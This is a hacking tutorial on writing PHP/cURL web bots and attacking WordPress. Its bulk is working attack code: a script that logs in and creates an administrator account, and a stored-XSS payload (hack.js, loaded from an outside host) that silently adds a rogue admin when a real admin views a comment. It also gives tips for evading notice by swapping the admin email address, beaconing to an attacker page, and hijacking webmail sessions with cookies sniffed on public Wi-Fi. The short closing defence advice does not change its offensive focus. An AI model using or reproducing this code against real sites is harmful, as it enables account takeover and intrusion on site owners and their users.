Coding Bots and Hacking WordPress

by Micha Lee

I'm going to explain how to write code that automatically loads web pages, submits forms, and does sinister stuff, while looking like it's human.

These techniques can be used to exploit Cross-Site Scripting (XSS) vulnerabilities, download copies of web-based databases, cheat in web games, and quite a bit more.  The languages I'm going to be using are PHP and JavaScript.  I'm primarily going to use WordPress as an example website that I'll be attacking, but that's only because I'm a fan of WordPress.

This stuff will work against any website, as long as you can find an XSS hole.

The HTTP Protocol

Before I dive too deeply into code, it's important to know the basics of how the web works.

It all runs over this protocol called HTTP, which is a very simple way that web browsers can communicate with web servers.  The browser makes requests, and the server returns some sort of output based on that.  Each time a browser makes an HTTP request, it includes a lot of header information, and each time the web server responds, it includes header information as well.

Sometimes websites use HTTPS, which is just HTTP wrapped in a layer of SSL/TLS encryption, so it uses the exact same protocol.

So, here's an example.  I just opened up my web browser, typed 2600.com in the address bar, and hit Enter.

Here's the GET request I sent to the server:

GET / HTTP/1.1
Host: 2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

My web browser was smart enough to figure out the IP address of 2600.com and open up a connection to it on port 80.

The first line is telling the web server that I want the page at the root path (/) of the website.

The next line is telling it that the host I'm looking for is 2600.com (sometimes the same web server hosts several different websites, so the Host header lets the web server know which one you're interested in).

The third line is my User-Agent string, and this tells the web server some information about myself.

From this one you can tell that I'm using Firefox 3.6.3 and I'm using Mac OS X 10.6.

The rest of the lines aren't all that important, but you can feel free to look them up.
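As a rough sketch of how the pieces of that request fit together, here is a small JavaScript function that splits a raw request into its request line and headers.  The name parseRequestHead is made up for this illustration, and the sample request is shortened to three lines of the one shown above.

```javascript
// Split a raw HTTP request head into its request line and headers.
// parseRequestHead is a hypothetical helper, not part of any library.
function parseRequestHead(raw) {
    var lines = raw.split(/\r?\n/);
    // The first line looks like: METHOD PATH VERSION
    var parts = lines[0].split(' ');
    var request = { method: parts[0], path: parts[1], version: parts[2], headers: {} };
    for (var i = 1; i < lines.length; i++) {
        if (lines[i] === '') break;          // a blank line ends the headers
        var colon = lines[i].indexOf(':');
        if (colon === -1) continue;          // skip anything that isn't "Name: value"
        // Header names are case-insensitive, so store them lowercased
        var name = lines[i].substring(0, colon).toLowerCase();
        request.headers[name] = lines[i].substring(colon + 1).trim();
    }
    return request;
}

var req = parseRequestHead(
    'GET / HTTP/1.1\r\n' +
    'Host: 2600.com\r\n' +
    'Connection: keep-alive\r\n' +
    '\r\n'
);
console.log(req.method, req.path, req.headers['host']); // GET / 2600.com
```

Only the first colon on each line is treated as the separator, so header values that contain colons themselves (like URLs) stay intact.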

A note about the User-Agent: It normally tells the web server what operating system and web browser you're using, and web servers use this information for a bunch of different things.

Google Analytics uses this to give website owners stats about what computers their visitors use.  A lot of websites check to see if the user agent says you're using an iPhone or an Android phone and then serve up a mobile version of the website instead of the normal one.

And then there are bots.  When Google spiders a website to add pages to its search engine database, it uses the HTTP protocol just like you and me, but its User-Agent string looks something like this instead:

User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)

It's ridiculously easy to spoof your user agent.  Try downloading the User-Agent Switcher Firefox extension just to see how easy it is.
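To see why spoofing works, it helps to look at how simple a typical User-Agent check is.  The following is only a sketch of the kind of test a site might run.  The function name describeUserAgent and the iPhone string are invented for illustration; real sites use longer pattern lists.

```javascript
// Guess what kind of client sent a request, based only on its User-Agent.
// describeUserAgent is a hypothetical helper for this example.
function describeUserAgent(ua) {
    if (/Googlebot/i.test(ua)) return 'bot';
    if (/iPhone|Android/i.test(ua)) return 'mobile';
    return 'desktop';
}

var firefox = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3';
var googlebot = 'Googlebot/2.1 (+http://www.google.com/bot.html)';
var phone = 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us)'; // made-up, abbreviated string

console.log(describeUserAgent(firefox));   // desktop
console.log(describeUserAgent(googlebot)); // bot
console.log(describeUserAgent(phone));     // mobile
```

The check has nothing to go on except a string that the client chose to send, so anything that sends the Googlebot string gets treated as Googlebot.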

After sending that GET request for / to 2600.com, here's the response my browser got:

HTTP/1.1 301 Moved Permanently
Date: Sat, 22 May 2010 23:02:49 GMT
Location: http://www.2600.com/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

It returned a 301 status code, which means the page has Moved Permanently.  This isn't an error, just a redirect.

Other common codes are 200, which means everything is O.K., 404, which means Not Found, and 500, which means Internal Server Error.

The rest of the lines are HTTP headers, but the important one is the Location header.  If my browser gets a Location header in a response, that means it needs to redirect to there instead.

In this case, loading http://2600.com wants me to redirect to http://www.2600.com.

My browser faithfully complies:

GET / HTTP/1.1
Host: www.2600.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]

I'm sending another GET request to the server, but this time with the host as www.2600.com, and it responds:

HTTP/1.1 200 OK
[more headers...]

<html>
<head>
<title>2600: The Hacker Quarterly</title>
<script type="text/javascript" src="nav.js"></script>
<link rel="stylesheet" type="text/css" href="nav.css" />
<link rel="alternate" type="application/rss+xml" title="2600.com RSS Feed" href="http://www.2600.com/rss.xml">
[more HTML code ...]

To recap, when we try to go to 2600.com, it redirects to www.2600.com (technically, these are separate domain names and could be hosting separate sites).

Once it returned a 200 OK, it spit out the HTML code of the website hosted at / on www.2600.com.

My browser sends requests, the server sends responses.  That's called HTTP.
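The redirect logic the browser followed can be sketched in a few lines of JavaScript.  This is a simplified illustration, not how any real browser is implemented, and the function names parseResponseHead and redirectTarget are invented here.

```javascript
// Parse the status line and headers of a raw HTTP response.
// parseResponseHead and redirectTarget are hypothetical helpers.
function parseResponseHead(raw) {
    var lines = raw.split(/\r?\n/);
    // The status line looks like: VERSION CODE REASON
    var match = /^HTTP\/\d\.\d (\d{3}) ?(.*)$/.exec(lines[0]);
    if (!match) throw new Error('not an HTTP response');
    var response = { status: parseInt(match[1], 10), reason: match[2], headers: {} };
    for (var i = 1; i < lines.length; i++) {
        if (lines[i] === '') break;          // a blank line ends the headers
        var colon = lines[i].indexOf(':');
        if (colon === -1) continue;
        var name = lines[i].substring(0, colon).toLowerCase();
        response.headers[name] = lines[i].substring(colon + 1).trim();
    }
    return response;
}

// Return the URL to request next, or null if the response is not a redirect.
function redirectTarget(response) {
    var isRedirect = response.status >= 300 && response.status < 400;
    if (isRedirect && response.headers['location']) {
        return response.headers['location'];
    }
    return null;
}

var moved = parseResponseHead(
    'HTTP/1.1 301 Moved Permanently\r\n' +
    'Location: http://www.2600.com/\r\n' +
    '\r\n'
);
var ok = parseResponseHead('HTTP/1.1 200 OK\r\n\r\n');

console.log(moved.status, redirectTarget(moved)); // 301 http://www.2600.com/
console.log(ok.status, redirectTarget(ok));       // 200 null
```

A bot that wants to behave like a browser has to do the same thing: notice the 3xx status, read the Location header, and send a second request.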

A Quick Note About Cookies

Cookies are name-value pairs that websites use to save information in your web browser.

One of their main uses is to keep persistent data about you in an active "session" as you make several requests to the server.  When you log in to a website, the only way it knows that you're still logged in the next time you reload the page is that you send your cookie back to the website as a line in the headers.

You pass cookies to the web server with the Cookie header, and the web server sets cookies in your browser with the Set-Cookie header.
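Here is a minimal sketch of the bookkeeping involved: it takes the values of some Set-Cookie headers and builds the value of the Cookie header to send back.  The function name buildCookieHeader and the two sample cookies are made up for illustration.  The sketch deliberately ignores attributes such as path, domain, and expiry, which a real browser honors.

```javascript
// Turn Set-Cookie header values into the value of a Cookie request header.
// buildCookieHeader is a hypothetical helper; it ignores path, domain and expiry.
function buildCookieHeader(setCookieValues) {
    var jar = {};
    var order = [];
    setCookieValues.forEach(function (value) {
        // Only the first name=value pair is the cookie; the rest are attributes
        var pair = value.split(';')[0].trim();
        var eq = pair.indexOf('=');
        if (eq === -1) return;
        var name = pair.substring(0, eq);
        if (!Object.prototype.hasOwnProperty.call(jar, name)) order.push(name);
        jar[name] = pair.substring(eq + 1);  // a later cookie with the same name wins
    });
    return order.map(function (name) {
        return name + '=' + jar[name];
    }).join('; ');
}

var header = buildCookieHeader([
    'session=abc123; path=/; httponly',   // made-up sample cookies
    'theme=dark; path=/'
]);
console.log('Cookie: ' + header); // Cookie: session=abc123; theme=dark
```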

This is important to understand because a lot of bots you write might require you to correctly handle cookies to do what you want, especially if you want to do something like exploit an XSS bug, make a social networking worm, or write a script that downloads and stores everything from someone's web mail account.

Some Tools to See WTF is Going On

You rarely actually see what HTTP headers you're sending to web servers, and what headers are included in the responses.

For writing this article, I used the Firefox extensions Live HTTP Headers and Tamper Data.  Other Firefox extensions that you might find useful are Firebug and Web Developer (useful for cookie management).

Also, Wireshark and tcpdump are great tools for any sort of network monitoring.  And if you're trying this on more complicated sites, especially ones with lots of Ajax, I highly suggest using an intercepting proxy like Paros or WebScarab.

Start with Something Simple

With PHP, the best way to write a web bot is to use the cURL functions.

The cURL functions to know are: curl_init(), curl_setopt(), curl_exec(), and curl_close()

Here's an example of a simple PHP script that checks 2600's Twitter feed and prints out the latest tweet.  And, just for laughs, we'll pretend to be using IE6 on Windows:

get-2600-tweet.php:

<?php
// get twitter.com/2600, and store it in $output
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://twitter.com/2600');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)');
$output = curl_exec($ch);
curl_close($ch);
// search through $output for the latest tweet
$start_string = '<span class="entry-content">';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end = strpos($output, '</span>', $start);
$tweet = substr($output, $start, $end-$start);
// display this tweet to the screen
echo(trim($tweet)."\n");
?>

Go ahead and make a new PHP file and put this code in it.

Run it either from a web browser (you need to copy it to the web root of a computer with a web server installed) or the command line (type php get-2600-tweet.php as long as you have PHP and libcurl installed).  Assuming Twitter hasn't changed their layout since I wrote this, it should print out 2600's latest tweet.

I'll go through it line by line.

In the first block of code, curl_init() gets called and stores a handle to the curl object in the variable $ch.

The next three lines of code add options to this curl object: the URL of the website it will be loading, that we want curl_exec() to return all the HTML code, and we set a fake user agent string pretending we're using IE6.

The next line of code runs curl_exec(), which actually sends the HTTP request to twitter.com/2600, and then stores everything returned into $output.

And then the next line, just to be good, closes the curl object.  Now we have all the HTML from that request stored in the variable $output, as one large string.

The next block of code searches through the returned HTML code for the first tweet.

It uses very common string handling functions: strpos(), strlen(), and substr().

Every programming language has some of this stuff built in, and if you're not familiar with these functions, I encourage you to look them up.

Basically, this searches $output for the first occurrence of the string <span class="entry-content">, and then the next </span> after that, and stores what's between those in the variable $tweet.

I figured this out by going to twitter.com/2600 myself and viewing the source of the page.

And then the final echo() function just prints out $tweet.  The trim() function strips the white space, and then I add a new line at the end to make the display a little prettier.
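The same search-between-two-markers idea can be sketched in JavaScript, using indexOf() and substring() in place of strpos() and substr().  The function name extractBetween and the sample HTML are invented for this example.  Unlike the PHP above, this version returns null when either marker is missing instead of carrying on with a bad offset.

```javascript
// Return the text between the first startMarker and the next endMarker,
// or null if either marker is missing. extractBetween is a hypothetical helper.
function extractBetween(text, startMarker, endMarker) {
    var start = text.indexOf(startMarker);
    if (start === -1) return null;
    start += startMarker.length;
    var end = text.indexOf(endMarker, start);
    if (end === -1) return null;
    return text.substring(start, end).trim();
}

var html = '<li><span class="entry-content"> Hello from the feed </span></li>'; // made-up sample
console.log(extractBetween(html, '<span class="entry-content">', '</span>')); // Hello from the feed
console.log(extractBetween(html, '<div id="missing">', '</div>'));            // null
```

Checking for the missing-marker case matters in practice, because this kind of scraping breaks as soon as the site changes its layout.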

Pretty cool, huh?

Automatically Creating WordPress Users

Now let's do something a little more difficult.

Let's log in to a WordPress website (for this example, hosted at localhost/wordpress) and add a new administrator user.

I'll do this manually first and record the HTTP conversation with the Live HTTP Headers extension.

POST /wordpress/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[some extra headers...]
Referer: http://localhost/wordpress/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
log=admin&pwd=supersecret&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1

This time I sent a POST request (the ones above for 2600.com and twitter.com were GET requests), and this time I also sent a Referer header, and a Cookie header.

POST and GET are similar, but GET requests send all the data through the URL, while POST requests send the data in the body of the request, beneath the headers.

As you can see, beneath the POST request headers is a URL-encoded string of name-value pairs.

log is set to admin (which is the username), pwd is set to supersecret (which is the password), and then there are other hidden fields that get sent too: wp-submit is Log In, redirect_to is http://localhost/wordpress/wp-admin/, and testcookie is 1.
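To make the URL encoding concrete, this sketch decodes the body of the login request above with URLSearchParams, which is built into browsers and Node.js.  The variable names are arbitrary.

```javascript
// The POST body from the login request, exactly as it was sent
var body = 'log=admin&pwd=supersecret&wp-submit=Log+In' +
    '&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1';

// URLSearchParams splits on & and =, and undoes the + and %XX escapes
var fields = new URLSearchParams(body);
console.log(fields.get('log'));         // admin
console.log(fields.get('wp-submit'));   // Log In
console.log(fields.get('redirect_to')); // http://localhost/wordpress/wp-admin/

// Content-Length is the number of bytes in the encoded body
console.log(body.length);               // 116

// Encoding the decoded fields again gives back the same string
console.log(fields.toString() === body); // true
```

Spaces become +, and characters like : and / become %3A and %2F, which is why the redirect_to value looks so mangled on the wire.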

And here was the response:

HTTP/1.1 302 Found
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6; path=/wordpress/wp-content/plugins; httponly
Set-Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C70045a572d5f43ad9d0fe822683fe7f6; path=/wordpress/wp-admin; httponly
Set-Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274755424%7C32f9298d9371bbc7f684dafb2ce161bb; path=/wordpress/; httponly
Location: http://localhost/wordpress/wp-admin/
[some more headers here too...]

After logging in, the website sets four cookies, and each cookie has a path.

As you can see, two of the cookies have the same name and value, but different paths.  Don't worry about this: the browser only sends a cookie with requests whose path falls under the cookie's path, so it will only send one copy of this cookie.
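The path rule can be sketched like this.  It follows the path-matching rule described in RFC 6265, but it is a simplified illustration rather than a full cookie implementation.  The function name pathMatches and the short labels standing in for the long cookie names are made up for this example.

```javascript
// Decide whether a cookie with the given path should be sent with a request.
// pathMatches is a hypothetical helper following the RFC 6265 path-match rule.
function pathMatches(requestPath, cookiePath) {
    if (requestPath === cookiePath) return true;
    if (requestPath.indexOf(cookiePath) !== 0) return false;
    // The cookie path is a prefix; it must end on a "/" boundary
    return cookiePath.charAt(cookiePath.length - 1) === '/' ||
           requestPath.charAt(cookiePath.length) === '/';
}

// The four cookies from the login response, with shortened stand-in names
var cookies = [
    { name: 'test_cookie',         path: '/wordpress/' },
    { name: 'auth (plugins copy)', path: '/wordpress/wp-content/plugins' },
    { name: 'auth (admin copy)',   path: '/wordpress/wp-admin' },
    { name: 'logged_in',           path: '/wordpress/' }
];

var sent = cookies.filter(function (cookie) {
    return pathMatches('/wordpress/wp-admin/user-new.php', cookie.path);
}).map(function (cookie) {
    return cookie.name;
});
console.log(sent.join(', ')); // test_cookie, auth (admin copy), logged_in
```

For a request under /wordpress/wp-admin/, only the copy scoped to that path goes out, which matches what shows up in the Cookie header of the next request.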

Now I'm going ahead and adding a new user called hacker with the email address hacker@fakeemailaddress.com and the password letmein.

Here's the POST request:

POST /wordpress/wp-admin/user-new.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
[more headers...]
Referer: http://localhost/wordpress/wp-admin/user-new.php
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C2fd245efd985716182bf76c2a5d44693; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1274585390; wp-settings-1=m6%3Do; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1274758230%7C037c433811bd050823ae570f3b3d38d5
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
_wpnonce=07cd245b42&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login=hacker&first_name=&last_name=&email=hacker%40fakeemailaddress.com&url=&pass1=letmein&pass2=letmein&role=administrator&adduser=Add+User

In order to add a new user, I need to send a POST request to: /wordpress/wp-admin/user-new.php

I need to pass along a cookie string with the cookies that were set earlier.

The data for the POST request needs to include these fields: _wpnonce, _wp_http_referer, action, user_login, first_name, last_name, email, url, pass1, pass2, role, and adduser (although several of the values are blank).

The first field, _wpnonce, is going to cause a problem.  That's there specifically to prevent people like me from doing things like this.  The value is 07cd245b42, but how are we supposed to know that?

If I look at the source code of the add user page, it contains this:

<input type="hidden" id="_wpnonce" name="_wpnonce" value="07cd245b42" />

To get that value, we'll just need to send a GET request to /wordpress/wp-admin/user-new.php first, search through its HTML for the hidden field called _wpnonce, and then submit the form with that value.

Here's a PHP script that does all of that:

add-wordpress.php:

<?php
// set the url of the wordpress site to do this on
$wp_url = 'http://localhost/wordpress';
// this will only work if we already have a username and password
$username = 'admin';
$password = 'supersecret';
// set the username, password, and email of the new user we will create
$new_username = 'hacker';
$new_password = 'letmein';
$new_email = 'hacker@fakeemailaddress.com';
// make up a user agent to use, lets say IE6 again
$user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
// start by logging into wordpress (using POST, not GET)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$output = curl_exec($ch);
curl_close($ch);
// search $output for the four cookies, add them to an array
$index = 0;
$cookieStrings = array();
for($i=0; $i<4; $i++) {
    $start_string = 'Set-Cookie: ';
    $start = strpos($output, $start_string, $index) + strlen($start_string);
    $end_string = ';';
    $end = strpos($output, $end_string, $start);
    $cookieStrings[] = substr($output, $start, $end-$start);
    $index = $end + strlen($end_string);
}
// turn cookies into a single cookie string (skipping 3rd cookie, since it's the same as 2nd)
$cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];
// load the add user page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
// search for _wpnonce hidden field value
$start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end_string = '" />';
$end = strpos($output, $end_string, $start);
$_wpnonce = substr($output, $start, $end-$start);
// add our new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
?>

This little piece of code totally works (with WordPress 2.9.2 anyway).

Change the $wp_url, $username, and $password to a WordPress site you control, and run it.

Go look at your WordPress users.  You'll have a new administrator user called hacker.

Thoughts on PHP Bots

Using PHP and cURL, you can write a bot that can do (almost) anything a human can do, as long as you're able to do it by hand first and see what the HTTP headers look like.  And since it's a bot, it's simple to run it, say, 150,000 times in a row, or to run it once every five minutes until you want to stop it.

What if you want to be anonymous?

It's easy to use cURL through a proxy server, and in fact you can even use cURL through the Tor network (though it will be much slower).  Just look up the docs for curl_setopt() to find out how.

I mentioned writing bots that can download and store all the email in a webmail account.

Well, webmail uses HTTP, which means it uses cookies to keep track of active sessions.  It's totally feasible to write a PHP script that, given a cookie string for someone's Yahoo! mail account (which you can get by sniffing traffic on a public Wi-Fi network), can download and store all of their email as long as they don't log out before your script is done running.

These are all things you can do with PHP, or with any other server-side language like Ruby, Python, Perl, or C.  But JavaScript on the other hand runs in web browsers, and you can get other people (like admins or other users of websites you're trying to hack) to run your code in their browsers if you exploit an XSS bug.

What is XSS?

An XSS bug is where you can submit information that includes JavaScript code to a website that gets displayed back to users of that website.

So, for example, maybe your first name is Bob, and your last name <script>alert(0)</script>.  If, after you submit this form, it says your first name is Bob and it pops up an alert box that says 0, that means you've found an XSS bug.  If someone else goes to your profile page, it will pop up an alert box for them that says 0 too.
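The bug boils down to a page that pastes user input straight into its HTML.  The sketch below shows the difference between doing that and escaping the input first.  The function name escapeHtml and the page fragment are invented for illustration, and a real site would usually rely on its framework's escaping rather than a hand-rolled helper.

```javascript
// Replace the characters that have special meaning in HTML.
// escapeHtml is a hypothetical helper for this example.
function escapeHtml(text) {
    return String(text)
        .replace(/&/g, '&amp;')   // must come first, or it would re-escape the others
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

var lastName = '<script>alert(0)</script>';

// Vulnerable: the browser sees a real <script> tag and runs it
var vulnerable = '<p>Last name: ' + lastName + '</p>';

// Safe: the browser displays the text instead of executing it
var safe = '<p>Last name: ' + escapeHtml(lastName) + '</p>';

console.log(vulnerable); // <p>Last name: <script>alert(0)</script></p>
console.log(safe);       // <p>Last name: &lt;script&gt;alert(0)&lt;/script&gt;</p>
```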

Popping up an alert box is harmless enough, but with the power of Ajax, you can do a lot more sinister stuff.

Admins often have the ability to add new users to websites.  If an admin stumbles upon your profile where the Last Name field actually contains JavaScript, that code could silently add you as an admin user on the site, and even alert you that this has happened so you can log in, escalate privileges to command execution on their server, and cover your tracks.

People use Ajax as a buzzword to mean any sort of fancy JavaScript.

Really, all Ajax is is the ability for JavaScript to make its own HTTP requests and retrieve the responses, similar to the cURL library in PHP.

The WordPress XSS Payload

The PHP script that added a new user is a good start, but it's not very useful for hacking websites.

You need to already have access!

With XSS, you trick someone else who does have access to run it for you.  Pretend with me that there's an XSS bug in the comment form in WordPress.  You can post a comment and include JavaScript code that will then get executed whenever anyone loads the page.

You post a comment that says:

Good point! And all the other commenters are a bunch of trolls! <script src="http://example.com/hack.js"></script>

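Whenever anyone loads this page, their browser fetches http://example.com/hack.js from your server and executes it as if it were part of the WordPress site, with that visitor's cookies and privileges.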

Here's what's in hack.js:

// setup
var wp_url = 'http://localhost/wordpress';
var new_username = 'hacker';
var new_password = 'letmein';
var new_email = 'hacker@fakeemailaddress.com';
// create an ajax object and return it
function ajaxObject() {
    var http;
    if(window.XMLHttpRequest) { http=new XMLHttpRequest(); }
    else{ http=new ActiveXObject("Microsoft.XMLHTTP"); }
    return http;
}
// load the user page
var http1 = ajaxObject();
http1.open("GET",wp_url+"/wp-admin/user-new.php",true);
http1.onreadystatechange = function() {
    if(http1.readyState != 4)
        return;
    
    // search for _wpnonce hidden field value
    var start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
    var start = http1.responseText.indexOf(start_string, 0) + start_string.length;
    var end_string = '" />';
    var end = http1.responseText.indexOf(end_string, start);
    var _wpnonce = http1.responseText.substring(start,end);
    
    // add our new user
    var http2 = ajaxObject();
    http2.open("POST",wp_url+"/wp-admin/user-new.php",true);
    http2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http2.send('_wpnonce='+escape(_wpnonce)+'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='+escape(new_username)+'&first_name=&last_name=&email='+escape(new_email)+'&url=&pass1='+escape(new_password)+'&pass2='+escape(new_password)+'&role=administrator&adduser=Add+User');
}
http1.send();

If an admin loads this page, a new administrator user called hacker will silently get created.

If you want to test this out on a WordPress site you control, go ahead and upload this script as hack.js somewhere, and include it in a post (by editing the post in HTML mode).

Make sure you delete the hacker user first if it's already there.  Then, while you're logged in, load the post page, and go check to see what WordPress users your site has.  There will be a new one.

This particular script could be improved in a couple of ways.

For example, you can check to see if the user is logged into WordPress first before trying to add a new user (there will be a lot more traffic in the logs if each and every visitor sends extra requests to wp-admin/user-new.php).

Also, by default WordPress sends an email to the administrator of the site when a new user account gets created, so really this won't be silent at all.  To get around this, you can have the script first load the WordPress settings page to see what the admin email address is set to, then post the form to change the email address to your own email address, then add a new user, then submit the settings form again to change the email address back.

In this way, the real admin would never get an email about it, and you would instead.

It might take a week for the admin to get around to running your code, it might just take a day, or they might never run it.

If you want to be alerted when it happens, you can use Ajax to do that too.

Make a page on a website you control (say, http://example.com/alert.php) that sends you an email when it gets loaded.  Then have hack.js send an Ajax GET request to that page when it runs, and you'll get an email when your new account is created.

If you're creative, the possibilities are endless.

There are two ways to protect your websites against automated web bots and crazy XSS attacks.

First, the only way to defeat bots is to include some sort of CAPTCHA (those annoying images with skewed letters you need to retype).

Make sure it actually works - I've seen forms with CAPTCHAs that still work fine if you ignore the CAPTCHA field.  Your CAPTCHA doesn't have to be skewed letters, but it does have to be annoying.

All it is is a simple Turing test, something that's easy for humans to answer but hard/impossible for computers, which means you'll have to test your users before they can continue if it's important to you to thwart bots.
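The "ignore the CAPTCHA field" failure usually comes from a server-side check that only runs when the field is present.  Here is a sketch of a check that fails closed instead.  The function name captchaPassed, the field name captcha, and the idea that the expected answer is passed in directly are all assumptions made for this example.

```javascript
// Return true only if the form contains the correct CAPTCHA answer.
// captchaPassed and the "captcha" field name are hypothetical.
function captchaPassed(form, expectedAnswer) {
    var answer = form.captcha;
    // A missing or empty field is a failure, not a free pass
    if (typeof answer !== 'string' || answer === '') return false;
    return answer.trim().toLowerCase() === expectedAnswer.toLowerCase();
}

console.log(captchaPassed({ comment: 'hi' }, 'x7k2p'));                    // false
console.log(captchaPassed({ comment: 'hi', captcha: 'wrong' }, 'x7k2p'));  // false
console.log(captchaPassed({ comment: 'hi', captcha: 'X7K2P ' }, 'x7k2p')); // true
```

The important part is the first branch: a bot that simply leaves the field out of its POST request gets rejected the same way as one that guesses wrong.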

And finally, fix all your XSS holes!

XSS gets dismissed as a lowly not-very-harmful vulnerability because "So what if someone pops up an alert box?"

Hopefully, this article will show you that it's a bit more dangerous than that.
